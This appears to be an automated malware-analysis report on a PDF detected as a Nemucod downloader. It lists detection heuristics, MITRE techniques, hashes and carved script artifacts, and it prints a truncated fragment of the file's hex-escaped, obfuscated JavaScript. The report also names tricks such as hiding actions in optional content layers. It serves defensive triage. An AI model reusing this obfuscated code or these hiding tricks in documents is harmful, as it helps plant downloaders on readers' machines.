MALICIOUS
Risk Score: 294
Malware Insights
MITRE ATT&CK
- T1059.007 JavaScript
- T1203 Exploitation for Client Execution
- T1566.001 Spearphishing Attachment
This PDF file was flagged as malicious by multiple heuristics, including a critical PDF JavaScript exploit cluster and ClamAV detection for Txt.Downloader.Nemucod. The embedded JavaScript is heavily obfuscated using `eval()` and string concatenation, but analysis indicates it is designed to download and execute a secondary payload. The ClamAV detection name 'Txt.Downloader.Nemucod' strongly suggests this family of malware, which is known for downloading further malicious content.
Machine Learning
- Nyx PDF Classifier malicious score 0.9989
Heuristics (6)
- ClamAV: Txt.Downloader.Nemucod-6769573-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Txt.Downloader.Nemucod-6769573-0
- JavaScript action (low, 2 related findings, PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical, PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script:
  /S /JavaScript /JS (b'var vMt2 = new Function("\\x76\\x5f\\x73", \'\\x7b\\x72\\x65\\x74\\x75\\x72\\x6e\\x20\\x76\\x4e\\x45\\x6f\\x39\\x5b\\x22\\x73\\x70\\x22\\x2b\\x22\\x6c\\x69\\x74\\x22\\x5d\\x28\\x22\\x2c\\x22\\x29\\x5b\\x22\\x6a\\x6f\\x22\\x2b\\x22\\x69\\x6e\\x22\\x5d\\x28\\x22\\x22\\x29\\x3b\\x7d\');var vIq3 = new Function("\\x76\\x5f\\x73", \'\\x7b\\x76\\x61\\x72\\x20\\x76\\x5f\\x64\\x20\\x3d\\x20\\x6e\\x65\\x77\\x20\\x44\\x61\\x74\\x65\\x28\\x29\\x3b\\x76\\x5f\\x64\\x5b\\x22\\x73\\x65\\x74\\x55\\x54\\x4 … >>
- Embedded JS stream (low, PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact (medium, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Optional Content Group with action trigger (low, PDF_OPTIONAL_CONTENT): Optional Content Group (layer) co-occurs with an action trigger; content can be selectively hidden from viewers or scanners while the action still fires on open.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0014_000.js | pdf-javascript-stream | PDF /JS object 14 at offset 0xC0E | 17473 bytes |

SHA-256: c1659e18ec2acbc3aef8b186c320b2fc1b11de6705915fec70f328f40a0d9c26
Detection:
- ClamAV: Txt.Downloader.Nemucod-6769573-0
- Obfuscation or payload: likely. Carved artifact contains 48 eval/decoder/string-building token(s). Carved artifact contains 2 long hex-escaped blob(s).

Preview script (first 1,000 lines of the extracted script):

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0014_001.js | pdf-javascript-stream | PDF /JS object 14 at offset 0xC0E | 232 bytes |

SHA-256: c69c7fe581d36e4f1fba32bd9ef85a472cf74628ceec4e3dc1445767c9771e32
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long hex-escaped blob(s).

Preview script (first 1,000 lines of the extracted script):
b'var vMt2 = new Function("\x76\x5f\x73", '\x7b\x72\x65\x74\x75\x72\x6e\x20\x76\x4e\x45\x6f\x39\x5b\x22\x73\x70\x22\x2b\x22\x6c\x69\x74\x22\x5d\x28\x22\x2c\x22\x29\x5b\x22\x6a\x6f\x22\x2b\x22\x69\x6e\x22\x5d\x28\x22\x22\x29\x3b\x7d'